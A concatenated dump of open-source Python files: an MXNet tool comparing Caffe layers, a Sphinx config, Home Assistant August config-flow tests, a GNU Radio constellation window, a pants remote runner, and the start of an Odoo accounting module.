:return: arguments and auxiliary parameters on new device
"""
new_args = dict()
new_auxs = dict()
for k, v in arg_params.items():
new_args[k] = v.as_in_context(ctx)
for k, v in aux_params.items():
new_auxs[k] = v.as_in_context(ctx)
return new_args, new_auxs
def convert_and_compare_caffe_to_mxnet(image_url, gpu, caffe_prototxt_path, caffe_model_path,
caffe_mean, mean_diff_allowed, max_diff_allowed):
"""
Run the layer comparison on a caffe model, given its prototxt, weights and mean.
The comparison is done by inferring on a given image using both caffe and mxnet model
:param image_url: image file or url to run inference on
:param gpu: gpu to use, -1 for cpu
:param caffe_prototxt_path: path to caffe prototxt
:param caffe_model_path: path to caffe weights
:param caffe_mean: path to caffe mean file
"""
import caffe
from caffe_proto_utils import read_network_dag, process_network_proto, read_caffe_mean
from convert_model import convert_model
if isinstance(caffe_mean, str):
caffe_mean = read_caffe_mean(caffe_mean)
elif caffe_mean is None:
pass
elif len(caffe_mean) == 3:
# swap channels from Caffe BGR to RGB
caffe_mean = caffe_mean[::-1]
# get caffe root location, this is needed to run the upgrade network utility, so we only need
# to support parsing of latest caffe
caffe_root = os.path.dirname(os.path.dirname(caffe.__path__[0]))
caffe_prototxt_path = process_network_proto(caffe_root, caffe_prototxt_path)
_, layer_name_to_record, top_to_layers = read_network_dag(caffe_prototxt_path)
caffe.set_mode_cpu()
caffe_net = caffe.Net(caffe_prototxt_path, caffe_model_path, caffe.TEST)
image_dims = tuple(caffe_net.blobs['data'].shape)[2:4]
logging.info('getting image %s', image_url)
img_rgb = read_image(image_url, image_dims, caffe_mean)
img_bgr = img_rgb[:, ::-1, :, :]
caffe_net.blobs['data'].reshape(*img_bgr.shape)
caffe_net.blobs['data'].data[...] = img_bgr
_ = caffe_net.forward()
# read sym and add all outputs
sym, arg_params, aux_params, _ = convert_model(caffe_prototxt_path, caffe_model_path)
sym = sym.get_internals()
# now mxnet
if gpu < 0:
ctx = mx.cpu(0)
else:
ctx = mx.gpu(gpu)
arg_params, aux_params = _ch_dev(arg_params, aux_params, ctx)
arg_params["data"] = mx.nd.array(img_rgb, ctx)
arg_params["prob_label"] = mx.nd.empty((1,), ctx)
exe = sym.bind(ctx, arg_params, args_grad=None, grad_req="null", aux_states=aux_params)
exe.forward(is_train=False)
compare_layers_from_nets(caffe_net, arg_params, aux_params, exe, layer_name_to_record,
top_to_layers, mean_diff_allowed, max_diff_allowed)
return
def _bfs(root_node, process_node):
"""
Implementation of Breadth-first search (BFS) on caffe network DAG
:param root_node: root node of caffe network DAG
:param process_node: function to run on each node
"""
from collections import deque
seen_nodes = set()
next_nodes = deque()
seen_nodes.add(root_node)
next_nodes.append(root_node)
while next_nodes:
current_node = next_nodes.popleft()
# process current node
process_node(current_node)
for child_node in current_node.children:
if child_node not in seen_nodes:
seen_nodes.add(child_node)
next_nodes.append(child_node)
def compare_layers_from_nets(caffe_net, arg_params, aux_params, exe, layer_name_to_record,
top_to_layers, mean_diff_allowed, max_diff_allowed):
"""
Compare layer by layer of a caffe network with mxnet network
:param caffe_net: loaded caffe network
:param arg_params: arguments
:param aux_params: auxiliary parameters
:param exe: mxnet model
:param layer_name_to_record: map between caffe layer and information record
:param top_to_layers: map between caffe blob name to layers which outputs it (including inplace)
:param mean_diff_allowed: mean difference allowed between caffe blob and mxnet blob
:param max_diff_allowed: max difference allowed between caffe blob and mxnet blob
"""
import re
log_format = ' {0:<40} {1:<40} {2:<8} {3:>10} {4:>10} {5:<1}'
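    # A function attribute acts as a mutable static flag, letting the nested
    # helpers detect the first convolution (whose weights need the BGR->RGB swap).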
compare_layers_from_nets.is_first_convolution = True
def _compare_blob(caf_blob, mx_blob, caf_name, mx_name, blob_type, note):
diff = np.abs(mx_blob - caf_blob)
diff_mean = diff.mean()
diff_max = diff.max()
logging.info(log_format.format(caf_name, mx_name, blob_type, '%4.5f' % diff_mean,
'%4.5f' % diff_max, note))
assert diff_mean < mean_diff_allowed
assert diff_max < max_diff_allowed
def _process_layer_parameters(layer):
logging.debug('processing layer %s of type %s', layer.name, layer.type)
normalized_layer_name = re.sub('[-/]', '_', layer.name)
# handle weight and bias of convolution and fully-connected layers
if layer.name in caffe_net.params and layer.type in ['Convolution', 'InnerProduct',
'Deconvolution']:
has_bias = len(caffe_net.params[layer.name]) > 1
mx_name_weight = '{}_weight'.format(normalized_layer_name)
            mx_weight = arg_params[mx_name_weight].asnumpy()
            # first convolution should change from BGR to RGB
            if layer.type == 'Convolution' and compare_layers_from_nets.is_first_convolution:
                compare_layers_from_nets.is_first_convolution = False
                # if RGB or RGBA
                if mx_weight.shape[1] == 3 or mx_weight.shape[1] == 4:
                    # Swapping BGR of caffe into RGB in mxnet
                    mx_weight[:, [0, 2], :, :] = mx_weight[:, [2, 0], :, :]
            caf_weight = caffe_net.params[layer.name][0].data
            _compare_blob(caf_weight, mx_weight, layer.name, mx_name_weight, 'weight', '')
            if has_bias:
                mx_name_bias = '{}_bias'.format(normalized_layer_name)
                mx_bias = arg_params[mx_name_bias].asnumpy()
                caf_bias = caffe_net.params[layer.name][1].data
                _compare_blob(caf_bias, mx_bias, layer.name, mx_name_bias, 'bias', '')
elif layer.name in caffe_net.params and layer.type == 'Scale':
if 'scale' in normalized_layer_name:
bn_name = normalized_layer_name.replace('scale', 'bn')
elif 'sc' in normalized_layer_name:
bn_name = normalized_layer_name.replace('sc', 'bn')
else:
assert False, 'Unknown name convention for bn/scale'
beta_name = '{}_beta'.format(bn_name)
gamma_name = '{}_gamma'.format(bn_name)
            mx_beta = arg_params[beta_name].asnumpy()
            caf_beta = caffe_net.params[layer.name][1].data
            _compare_blob(caf_beta, mx_beta, layer.name, beta_name, 'beta', '')
            mx_gamma = arg_params[gamma_name].asnumpy()
            caf_gamma = caffe_net.params[layer.name][0].data
            _compare_blob(caf_gamma, mx_gamma, layer.name, gamma_name, 'gamma', '')
elif layer.name in caffe_net.params and layer.type == 'BatchNorm':
mean_name = '{}_moving_mean'.format(normalized_layer_name)
var_name = '{}_moving_var'.format(normalized_layer_name)
caf_rescale_factor = caffe_net.params[layer.name][2].data
mx_mean = aux_params[mean_name].asnumpy()
caf_mean = caffe_net.params[layer.name][0].data / caf_rescale_factor
_compare_blob(caf_mean, mx_mean, layer.name, mean_name, 'mean', '')
mx_var = aux_params[var_name].asnumpy()
caf_var = caffe_net.params[layer.name][1].data / caf_rescale_factor
_compare_blob(caf_var, mx_var, layer.name, var_name, 'var',
'expect 1e-04 change due to cudnn eps')
elif layer.type in ['Input', 'Pooling', 'ReLU', 'Eltwise', 'Softmax', 'LRN', 'Concat',
'Dropout', 'Crop']:
# no parameters to check for these layers
pass
else:
logging.warn('No handling for layer %s of type %s, should we ignore it?', layer.name,
layer.type)
return
def _process_layer_output(caffe_blob_name):
logging.debug('processing blob %s', caffe_blob_name)
# skip blobs not originating from actual layers, e.g. artificial split layers added by caffe
if caffe_blob_name not in top_to_layers:
return
caf_blob = caffe_net.blobs[caffe_blob_name].data
# data should change from BGR to RGB
if caffe_blob_name == 'data':
# if RGB or RGBA
if caf_blob.shape[1] == 3 or caf_blob.shape[1] == 4:
# Swapping BGR of caffe into RGB in mxnet
caf_blob[:, [0, 2], :, :] = caf_blob[:, [2, 0], :, :]
mx_name = 'data'
else:
# get last layer name which outputs this blob name
last_layer_name = top_to_layers[caffe_blob_name][-1]
normalized_last_layer_name = re.sub('[-/]', '_', last_layer_name)
mx_name = '{}_output'.format(normalized_last_layer_name)
if 'scale' in mx_name:
mx_name = mx_name.replace('scale', 'bn')
elif 'sc' in mx_name:
mx_name = mx_name.replace('sc', 'bn')
if mx_name not in exe.output_dict:
logging.error('mxnet blob %s is missing, time to extend the compare tool..', mx_name)
return
mx_blob = exe.output_dict[mx_name].asnumpy()
_compare_blob(caf_blob, mx_blob, caffe_blob_name, mx_name, 'output', '')
return
# check layer parameters
logging.info('\n***** Network Parameters '.ljust(140, '*'))
logging.info(log_format.format('CAFFE', 'MXNET', 'Type', 'Mean(diff)', 'Max(diff)', 'Note'))
first_layer_name = layer_name_to_record.keys()[0]
_bfs(layer_name_to_record[first_layer_name], _process_layer_parameters)
# check layer output
logging.info('\n***** Network Outputs '.ljust(140, '*'))
logging.info(log_format.format('CAFFE', 'MXNET', 'Type', 'Mean(diff)', 'Max(diff)', 'Note'))
for caffe_blob_name in caffe_net.blobs.keys():
_process_layer_output(caffe_blob_name)
return
def main():
"""Entrypoint for compare_layers"""
parser = argparse.ArgumentParser(
description='Tool for testing caffe to mxnet conversion layer by layer')
parser.add_argument('--image_url', type=str,
default='http://writm.com/wp-content/uploads/2016/08/Cat-hd-wallpapers.jpg',
help='input image to test inference, can be either file path or url')
parser.add_argument('--caffe_prototxt_path', type=str,
default='./model.prototxt',
help='path to caffe prototxt')
parser.add_argument('--caffe_model_path', type=str,
default='./model.caffemodel',
help='path to caffe weights')
parser.add_argument('--caffe_mean', type=str,
default='./model_mean.binaryproto',
help='path to caffe mean file')
    parser.add_argument('--mean_diff_allowed', type=float, default=1e-03,
                        help='mean difference allowed between caffe blob and mxnet blob')
    parser.add_argument('--max_diff_allowed', type=float, default=1e-01,
                        help='max difference allowed between caffe blob and mxnet blob')
parser.add_argument('--gpu', type=int, default=-1, help='the gpu id used for predict')
args = parser.parse_args()
convert_and_compare_caffe_to_mxnet(args.image_url, args.gpu, args.caffe_prototxt_path,
args.caffe_model_path, args.caffe_mean,
args.mean_diff_allowed, args.max_diff_allowed)
if __name__ == '__main__':
main()
| apache-2.0 |
icgc-dcc/dcc-storage | docs/conf.py | 1 | 5104 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# score documentation build configuration file, created by
# sphinx-quickstart on Thu Sep 27 15:44:32 2018.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.mathjax',
'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'score'
copyright = '2018, andricdu'
author = 'andricdu'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.4.0'
# The full version, including alpha/beta/rc tags.
release = '1.4.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
'**': [
'relations.html', # needs 'show_related': True theme option to display
'searchbox.html',
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'scoredoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'score.tex', 'score Documentation',
'andricdu', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'score', 'score Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'score', 'score Documentation',
author, 'score', 'One line description of project.',
'Miscellaneous'),
]
| gpl-3.0 |
mezz64/home-assistant | tests/components/august/test_config_flow.py | 5 | 9572 | """Test the August config flow."""
from august.authenticator import ValidationResult
from homeassistant import config_entries, setup
from homeassistant.components.august.const import (
CONF_ACCESS_TOKEN_CACHE_FILE,
CONF_INSTALL_ID,
CONF_LOGIN_METHOD,
DOMAIN,
VERIFICATION_CODE_KEY,
)
from homeassistant.components.august.exceptions import (
CannotConnect,
InvalidAuth,
RequireValidation,
)
from homeassistant.const import CONF_PASSWORD, CONF_TIMEOUT, CONF_USERNAME
from tests.async_mock import patch
from tests.common import MockConfigEntry
async def test_form(hass):
"""Test we get the form."""
await setup.async_setup_component(hass, "persistent_notification", {})
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
return_value=True,
), patch(
"homeassistant.components.august.async_setup", return_value=True
) as mock_setup, patch(
"homeassistant.components.august.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
},
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == "[email protected]"
assert result2["data"] == {
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
CONF_INSTALL_ID: None,
CONF_TIMEOUT: 10,
CONF_ACCESS_TOKEN_CACHE_FILE: "[email protected]",
}
assert len(mock_setup.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_invalid_auth(hass):
"""Test we handle invalid auth."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
side_effect=InvalidAuth,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "invalid_auth"}
async def test_user_unexpected_exception(hass):
"""Test we handle an unexpected exception."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
side_effect=ValueError,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "unknown"}
async def test_form_cannot_connect(hass):
"""Test we handle cannot connect error."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
side_effect=CannotConnect,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "cannot_connect"}
async def test_form_needs_validate(hass):
"""Test we present validation when we need to validate."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
side_effect=RequireValidation,
), patch(
"homeassistant.components.august.gateway.AuthenticatorAsync.async_send_verification_code",
return_value=True,
) as mock_send_verification_code:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
},
)
assert len(mock_send_verification_code.mock_calls) == 1
assert result2["type"] == "form"
assert result2["errors"] is None
assert result2["step_id"] == "validation"
    # Trying the WRONG verification code gives us the form back again
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
side_effect=RequireValidation,
), patch(
"homeassistant.components.august.gateway.AuthenticatorAsync.async_validate_verification_code",
return_value=ValidationResult.INVALID_VERIFICATION_CODE,
) as mock_validate_verification_code, patch(
"homeassistant.components.august.gateway.AuthenticatorAsync.async_send_verification_code",
return_value=True,
) as mock_send_verification_code, patch(
"homeassistant.components.august.async_setup", return_value=True
) as mock_setup, patch(
"homeassistant.components.august.async_setup_entry", return_value=True
) as mock_setup_entry:
result3 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{VERIFICATION_CODE_KEY: "incorrect"},
)
# Make sure we do not resend the code again
# so they have a chance to retry
assert len(mock_send_verification_code.mock_calls) == 0
assert len(mock_validate_verification_code.mock_calls) == 1
assert result3["type"] == "form"
assert result3["errors"] is None
assert result3["step_id"] == "validation"
# Try with the CORRECT verification code and we setup
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
return_value=True,
), patch(
"homeassistant.components.august.gateway.AuthenticatorAsync.async_validate_verification_code",
return_value=ValidationResult.VALIDATED,
) as mock_validate_verification_code, patch(
"homeassistant.components.august.gateway.AuthenticatorAsync.async_send_verification_code",
return_value=True,
) as mock_send_verification_code, patch(
"homeassistant.components.august.async_setup", return_value=True
) as mock_setup, patch(
"homeassistant.components.august.async_setup_entry", return_value=True
) as mock_setup_entry:
result4 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{VERIFICATION_CODE_KEY: "correct"},
)
await hass.async_block_till_done()
assert len(mock_send_verification_code.mock_calls) == 0
assert len(mock_validate_verification_code.mock_calls) == 1
assert result4["type"] == "create_entry"
assert result4["title"] == "[email protected]"
assert result4["data"] == {
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
CONF_INSTALL_ID: None,
CONF_TIMEOUT: 10,
CONF_ACCESS_TOKEN_CACHE_FILE: "[email protected]",
}
assert len(mock_setup.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_reauth(hass):
"""Test reauthenticate."""
entry = MockConfigEntry(
domain=DOMAIN,
data={
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
CONF_INSTALL_ID: None,
CONF_TIMEOUT: 10,
CONF_ACCESS_TOKEN_CACHE_FILE: "[email protected]",
},
unique_id="[email protected]",
)
entry.add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": "reauth"}, data=entry.data
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
return_value=True,
), patch(
"homeassistant.components.august.async_setup", return_value=True
) as mock_setup, patch(
"homeassistant.components.august.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
CONF_PASSWORD: "new-test-password",
},
)
await hass.async_block_till_done()
assert result2["type"] == "abort"
assert result2["reason"] == "reauth_successful"
assert len(mock_setup.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
| apache-2.0 |
MingdaZhou/gnuradio | gr-wxgui/python/wxgui/const_window.py | 58 | 6131 | #
# Copyright 2008 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
##################################################
# Imports
##################################################
import plotter
import common
import wx
import numpy
import math
import pubsub
from constants import *
from gnuradio import gr #for gr.prefs
import forms
##################################################
# Constants
##################################################
SLIDER_STEPS = 200
LOOP_BW_MIN_EXP, LOOP_BW_MAX_EXP = -6, 0.0
GAIN_MU_MIN_EXP, GAIN_MU_MAX_EXP = -6, -0.301
DEFAULT_FRAME_RATE = gr.prefs().get_long('wxgui', 'const_rate', 5)
DEFAULT_WIN_SIZE = (500, 400)
DEFAULT_CONST_SIZE = gr.prefs().get_long('wxgui', 'const_size', 2048)
CONST_PLOT_COLOR_SPEC = (0, 0, 1)
MARKER_TYPES = (
('Dot Small', 1.0),
('Dot Medium', 2.0),
('Dot Large', 3.0),
('Line Link', None),
)
DEFAULT_MARKER_TYPE = 2.0
##################################################
# Constellation window control panel
##################################################
class control_panel(wx.Panel):
"""
	A control panel with wx widgets to control the plotter.
"""
def __init__(self, parent):
"""
Create a new control panel.
Args:
parent: the wx parent window
"""
self.parent = parent
wx.Panel.__init__(self, parent, style=wx.SUNKEN_BORDER)
parent[SHOW_CONTROL_PANEL_KEY] = True
parent.subscribe(SHOW_CONTROL_PANEL_KEY, self.Show)
control_box = forms.static_box_sizer(
parent=self, label='Options',
bold=True, orient=wx.VERTICAL,
)
#loop_bw
control_box.AddStretchSpacer()
forms.text_box(
sizer=control_box, parent=self, label='Loop Bandwidth',
converter=forms.float_converter(),
ps=parent, key=LOOP_BW_KEY,
)
forms.log_slider(
sizer=control_box, parent=self,
min_exp=LOOP_BW_MIN_EXP,
max_exp=LOOP_BW_MAX_EXP,
num_steps=SLIDER_STEPS,
ps=parent, key=LOOP_BW_KEY,
)
#gain_mu
control_box.AddStretchSpacer()
forms.text_box(
sizer=control_box, parent=self, label='Gain Mu',
converter=forms.float_converter(),
ps=parent, key=GAIN_MU_KEY,
)
forms.log_slider(
sizer=control_box, parent=self,
min_exp=GAIN_MU_MIN_EXP,
max_exp=GAIN_MU_MAX_EXP,
num_steps=SLIDER_STEPS,
ps=parent, key=GAIN_MU_KEY,
)
#marker
control_box.AddStretchSpacer()
forms.drop_down(
sizer=control_box, parent=self,
ps=parent, key=MARKER_KEY, label='Marker',
choices=map(lambda x: x[1], MARKER_TYPES),
labels=map(lambda x: x[0], MARKER_TYPES),
)
#run/stop
control_box.AddStretchSpacer()
forms.toggle_button(
sizer=control_box, parent=self,
true_label='Stop', false_label='Run',
ps=parent, key=RUNNING_KEY,
)
#set sizer
self.SetSizerAndFit(control_box)
##################################################
# Constellation window with plotter and control panel
##################################################
class const_window(wx.Panel, pubsub.pubsub):
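	"""
	Constellation window: a channel plotter fed with complex samples, plus a
	control panel whose keys (loop bandwidth, gain mu/omega) are proxied to
	the controller of the underlying receiver block.
	"""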
def __init__(
self,
parent,
controller,
size,
title,
msg_key,
loop_bw_key,
gain_mu_key,
gain_omega_key,
omega_key,
sample_rate_key,
):
pubsub.pubsub.__init__(self)
#proxy the keys
self.proxy(MSG_KEY, controller, msg_key)
self.proxy(LOOP_BW_KEY, controller, loop_bw_key)
self.proxy(GAIN_MU_KEY, controller, gain_mu_key)
self.proxy(GAIN_OMEGA_KEY, controller, gain_omega_key)
self.proxy(OMEGA_KEY, controller, omega_key)
self.proxy(SAMPLE_RATE_KEY, controller, sample_rate_key)
#initialize values
self[RUNNING_KEY] = True
self[X_DIVS_KEY] = 8
self[Y_DIVS_KEY] = 8
self[MARKER_KEY] = DEFAULT_MARKER_TYPE
#init panel and plot
wx.Panel.__init__(self, parent, style=wx.SIMPLE_BORDER)
self.plotter = plotter.channel_plotter(self)
self.plotter.SetSize(wx.Size(*size))
self.plotter.SetSizeHints(*size)
self.plotter.set_title(title)
self.plotter.set_x_label('Inphase')
self.plotter.set_y_label('Quadrature')
self.plotter.enable_point_label(True)
self.plotter.enable_grid_lines(True)
#setup the box with plot and controls
self.control_panel = control_panel(self)
main_box = wx.BoxSizer(wx.HORIZONTAL)
main_box.Add(self.plotter, 1, wx.EXPAND)
main_box.Add(self.control_panel, 0, wx.EXPAND)
self.SetSizerAndFit(main_box)
		#keep gain_omega tied to gain_mu (second-order relation: gain_omega = 0.25*gain_mu**2)
def set_gain_omega(gain_mu): self[GAIN_OMEGA_KEY] = .25*gain_mu**2
self.subscribe(GAIN_MU_KEY, set_gain_omega)
#register events
self.subscribe(MSG_KEY, self.handle_msg)
self.subscribe(X_DIVS_KEY, self.update_grid)
self.subscribe(Y_DIVS_KEY, self.update_grid)
#initial update
self.update_grid()
def handle_msg(self, msg):
"""
Plot the samples onto the complex grid.
Args:
msg: the array of complex samples
"""
if not self[RUNNING_KEY]: return
#convert to complex floating point numbers
samples = numpy.fromstring(msg, numpy.complex64)
real = numpy.real(samples)
imag = numpy.imag(samples)
#plot
self.plotter.set_waveform(
channel=0,
samples=(real, imag),
color_spec=CONST_PLOT_COLOR_SPEC,
marker=self[MARKER_KEY],
)
#update the plotter
self.plotter.update()
def update_grid(self):
#update the x axis
x_max = 2.0
self.plotter.set_x_grid(-x_max, x_max, common.get_clean_num(2.0*x_max/self[X_DIVS_KEY]))
#update the y axis
y_max = 2.0
self.plotter.set_y_grid(-y_max, y_max, common.get_clean_num(2.0*y_max/self[Y_DIVS_KEY]))
#update plotter
self.plotter.update()
| gpl-3.0 |
manasapte/pants | src/python/pants/bin/remote_pants_runner.py | 7 | 3179 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import signal
import sys
from contextlib import contextmanager
from pants.java.nailgun_client import NailgunClient
from pants.java.nailgun_protocol import NailgunProtocol
from pants.pantsd.process_manager import ProcessMetadataManager
class RemotePantsRunner(object):
"""A thin client variant of PantsRunner."""
class PortNotFound(Exception): pass
PANTS_COMMAND = 'pants'
RECOVERABLE_EXCEPTIONS = (PortNotFound, NailgunClient.NailgunConnectionError)
def __init__(self, exiter, args, env, process_metadata_dir=None,
stdin=None, stdout=None, stderr=None):
"""
:param Exiter exiter: The Exiter instance to use for this run.
:param list args: The arguments (e.g. sys.argv) for this run.
:param dict env: The environment (e.g. os.environ) for this run.
:param str process_metadata_dir: The directory in which process metadata is kept.
:param file stdin: The stream representing stdin.
:param file stdout: The stream representing stdout.
:param file stderr: The stream representing stderr.
"""
self._exiter = exiter
self._args = args
self._env = env
self._process_metadata_dir = process_metadata_dir
self._stdin = stdin or sys.stdin
self._stdout = stdout or sys.stdout
self._stderr = stderr or sys.stderr
self._port = self._retrieve_pailgun_port()
if not self._port:
raise self.PortNotFound('unable to locate pailgun port!')
@staticmethod
def _combine_dicts(*dicts):
"""Combine one or more dicts into a new, unified dict (dicts to the right take precedence)."""
return {k: v for d in dicts for k, v in d.items()}
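    # e.g. _combine_dicts({'a': 1, 'b': 2}, {'b': 3}) returns {'a': 1, 'b': 3};
    # later dicts win on key collisions because they are iterated last.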
@contextmanager
def _trapped_control_c(self, client):
"""A contextmanager that overrides the SIGINT (control-c) handler and handles it remotely."""
def handle_control_c(signum, frame):
client.send_control_c()
existing_sigint_handler = signal.signal(signal.SIGINT, handle_control_c)
signal.siginterrupt(signal.SIGINT, False) # Retry interrupted system calls.
try:
yield
finally:
signal.signal(signal.SIGINT, existing_sigint_handler)
def _retrieve_pailgun_port(self):
return ProcessMetadataManager(
self._process_metadata_dir).read_metadata_by_name('pantsd', 'socket_pailgun', int)
def run(self, args=None):
# Merge the nailgun TTY capability environment variables with the passed environment dict.
ng_env = NailgunProtocol.isatty_to_env(self._stdin, self._stdout, self._stderr)
modified_env = self._combine_dicts(self._env, ng_env)
# Instantiate a NailgunClient.
client = NailgunClient(port=self._port, ins=self._stdin, out=self._stdout, err=self._stderr)
with self._trapped_control_c(client):
# Execute the command on the pailgun.
result = client.execute(self.PANTS_COMMAND, *self._args, **modified_env)
# Exit.
self._exiter.exit(result)
| apache-2.0 |
darkleons/odoo | addons/account/account_move_line.py | 9 | 78170 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from datetime import datetime
from openerp import workflow
from openerp.osv import fields, osv
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
from openerp import tools
from openerp.report import report_sxw
import openerp
